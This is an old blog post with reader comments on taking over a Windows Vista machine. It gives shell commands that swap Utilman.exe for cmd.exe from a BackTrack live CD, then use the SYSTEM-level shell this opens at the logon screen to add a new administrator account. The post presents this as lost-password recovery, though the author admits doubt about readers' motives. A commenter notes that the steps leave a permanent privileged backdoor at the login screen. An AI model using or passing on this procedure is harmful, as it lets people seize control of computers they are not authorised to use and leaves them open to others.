Hack Vista – Create a new admin account

PaulSpoerry | August 3, 2008

Why hack Windows passwords when you can simply create yourself a new Administrator account?

In a previous post I showed how you can use an Ophcrack Live CD to crack Windows passwords in minutes. It works, I’ve done it before and it really works. The free, open source Ophcrack Live CD is a Windows account password cracking tool designed to help you recover lost Windows passwords. Quite a few people have sent me emails or chatted me via my website saying “I forgot my password”, or “my kid locked himself out of his pc”. I’m unsure if that’s really the case or if they were just looking for a way to crack Windows passwords. However, if that is really the case there is potentially a much faster way to resolve your issue… just create a new Administrator account!

To create a new Administrator account you’ll want to grab a copy of the Offensive Security’s BackTrack Live CD which can be found here.

What is BackTrack?

BackTrack is the result of the merging of two Innovative Penetration Testing live Linux distributions – Whax and Auditor. BackTrack has been dubbed as the best Security Live CD today, and has been rated 1st in its category, and 32nd overall in Insecure.org. Based on SLAX (Slackware), BackTrack provides user modularity. This means the distribution can be easily customised by the user to include personal scripts, additional tools, customized kernels, etc.

BackTrack Terminal Window
BackTrack Terminal Window

Here’s a quick and dirty way to make a new user account.

Boot into Backtrack and open a shell prompt:

  • cd /mnt (change directory to mounted drives)
  • ls (get the list of mounted drives)
  • cd sda1 (sda1 is the main hard drive)
  • cd Windows/ (change to the windows directory)
  • cd System32/ (change to the system directory)
  • mv Utilman.exe Utilman.old (backup original file)
  • cp cmd.exe Utilman.exe (copy cmd.exe as utilman.exe)
  • reboot

Once rebooted, at vista logon screen do the following:

  • Press Windows key + U
  • To invoke Utility Manager ( A.K.A. CMD.exe)
  • Cmd.exe will spawn with ‘System’ privileges.
  • c:\>net user S00perAdmin mypassword /add
  • c:\>net localgroup administrators S00perAdmin /add
  • Reboot and log in with your newly added Admin account

There ya go… now instead of needing to “crack” you “lost” password you can simply create a new Administrator account, login with that and then change the lost accounts password to what you want it to be.

Post to Twitter Post to Delicious Delicious Post to Digg Digg This Post Post to Ping.fm Ping This Post Post to Reddit Reddit Post to StumbleUpon Stumble This Post

Related posts:

  1. L0phtCrack – Windows password cracker is back!
  2. KeePass – Securely Store Passwords (and have them available them ANYWHERE)
  3. How to Send and Receive Hotmail from Your Gmail Account

Categories
Hacking, Privacy, Tech, Vista Tweaks, Windows
Tags
, , , , , , , , , , , , , , , , , , , , , , , , ,
Comments rss
Comments rss
Trackback
Trackback

« »

10 Responses to “Hack Vista – Create a new admin account”

  1. Ophcrack Live CD - Crack Windows passwords in minutes | PaulSpoerry.com says:
    August 4, 2008 at 7:02 am

    [...] simply “lost” their password. If that’s the case you can use some free tools to create a new Administrator account. With this account you can simply change the existing accounts password, use the new Admin account, [...]

  2. Links for 2008-08-04 [del.icio.us] | Student Tech News says:
    August 4, 2008 at 11:16 pm

    [...] Hack Vista – Create a new admin account | PaulSpoerry.com [...]

  3. Scott says:
    August 23, 2008 at 2:38 pm

    This step-by-step instruction is incomplete. It leaves a copy of cmd.exe as utilman.exe and the hotkeys will continue to provide a system privilege command shell at the secure desktop login screen. It’s like a security/firedoor with multiple deadbolt locks (and a master key under the welcome mat).

  4. Password Vista Home verloren?! - 9lives says:
    December 21, 2008 at 1:08 pm

    [...] Of Hack Vista – Create a new admin account | PaulSpoerry.com [...]

  5. Ouderlijk toezicht windows Vista - 9lives says:
    December 22, 2008 at 7:45 am

    [...] Hack Vista – Create a new admin account | PaulSpoerry.com Gisteren ook al gepost. Gemakkelijk en het gaat rap [...]

  6. Q> Multi-client? - Gamerz Needs - For All Your Gaming Needs! says:
    April 21, 2009 at 3:52 am

    [...] before but i found this . It’s about using a program BackTrack to somehow add new accounts? Hack Vista – Create a new admin account | PaulSpoerry.com [...]

  7. stephanie says:
    June 12, 2009 at 5:50 am

    if you create a new Admin account, what will happen to the old Admin account? Does that mean that there will be two Administrator accounts? Please reply ASAP. Thanks :)

  8. PaulSpoerry says:
    June 12, 2009 at 6:07 am

    You’d have both accounts. There is no issue with a Windows machine having multiple administrator accounts.

  9. schwadegan says:
    January 10, 2010 at 5:14 pm

    Hi there Paul,
    I have a couple of questions regarding this method you’ve posted and would appreciate if you took the time to answer them.

    First off, how likely is it that this solution would work on Windows7?

    Secondly,
    c:\>net user S00perAdmin mypassword /add
    Written like that, i assume the name of the account would be S00perAdmin followed by my password of choice – however can I just ignore typing a password to leave it without one? ( and is it always “localgroup administrators” or may it differ depending on region? )

    Really appreciate you wrote this guide, hoping you’ll answer my questions aswell,
    Lenny.

  10. PaulSpoerry says:
    January 10, 2010 at 5:24 pm

    Given that 7 is built off of Vista, it’s pretty damned likely. That said, I haven’t tried it myself.

    You should never use an account without a password. If you need one without a PW use the built in guest account.

Leave a Reply

You must be logged in to post a comment.